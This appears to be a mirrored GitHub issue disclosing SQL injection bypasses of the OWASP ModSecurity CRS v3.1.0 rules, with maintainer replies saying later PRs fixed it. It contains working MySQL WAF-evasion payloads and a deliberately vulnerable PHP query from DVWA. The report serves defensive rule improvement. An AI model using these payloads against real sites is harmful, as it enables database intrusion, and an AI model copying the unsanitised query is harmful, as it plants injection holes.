Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Bypass the latest CRS v3.1.0 rules of SQL injection
See original GitHub issue_Issue originally created by user qazbnm456 on date 2018-09-04 10:47:07. Link to original issue: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1181._
Type of Issue
False Negative
Description
Per https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167, I wanna raise more FNs in this thread.
Before getting into other FNs, I want to give out more information to https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167 so as to help the maintainers fix the issue quickly. There’re two problems lead to those SQLi bypasses, and those evasions would only work with MySQL.
One is the lack of detections for legacy syntaxes, such as the ODBC escape syntax, which is accepted for ODBC compatibility (Ref: https://dev.mysql.com/doc/refman/5.5/en/expressions.html); the other one is the insufficient protection of libinjection due to the parsing process inside ticks. Return TYPE_FUNCTION when it encounters one of keywords of function names. You can clearly see the difference while parsing the following two quries. Because 1&{f1 doesn’t in the fingerprint database, it has been flaged as a benign query.
Apart from that, I present additional SQLi bypasses in this issue here, and some of them also play with the same trick mentioned above together. Say, we have a code snippet that looks like this:
// Get input
$id = $_REQUEST['id'];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
- Following queries would bypass the protections of SQL injection attempts in PL1:
a'+(SELECT 1)+'-1' AND 2<@ UNION/*!SELECT*/1, version()'
- Following queries would bypass the protections of SQL injection attempts in PL2:
-1'<@=1 OR {a 1}=1 OR '-1'<@=1 OR {x (select 1)}='1a'+(SELECT 1)+'
These evasions work well with MySQL but may fail with other DBMS. I do the trick with the help of the <@ symbol because libinjection doesn’t handle it well, especially with MySQL, and therefore, <@ can be used to bypass the detection of libinjection (Ref: https://github.com/client9/libinjection/blob/master/src/libinjection_sqli_data.h#L8681). Because 1&1o doesn’t in the fingerprint database as well, it has been flaged as a benign query.
Some screenshots (The vulnerable web application is DVWA):
Your Environment
- CRS version: v3.1/dev806df0effbb89d2ba069b623162597e488119d2d
- ModSecurity version: v3/master
- Web Server and version: nginx/1.15.0
- Operating System and version: macOS 10.14
Issue Analytics
- State:
- Created 3 years ago
- Comments:5
Top Results From Across the Web
Top Related Medium Post
Top Related StackOverflow Question
Troubleshoot Live Code
Top Related Reddit Thread
Top Related Hackernoon Post
Top Related Tweet
Top Related Dev.to Post
Top Related Hashnode Post
User dune73 commented on date 2019-04-01 16:46:56:
That sounds like a well thought through proposal. I think you should do this!
User franbuehler commented on date 2019-10-24 08:21:40:
Yes, this issue is solved by the mentioned PRs: #1335 #1326
Not all SQLi bypasses are detected at PL1, but that’s not possible I think.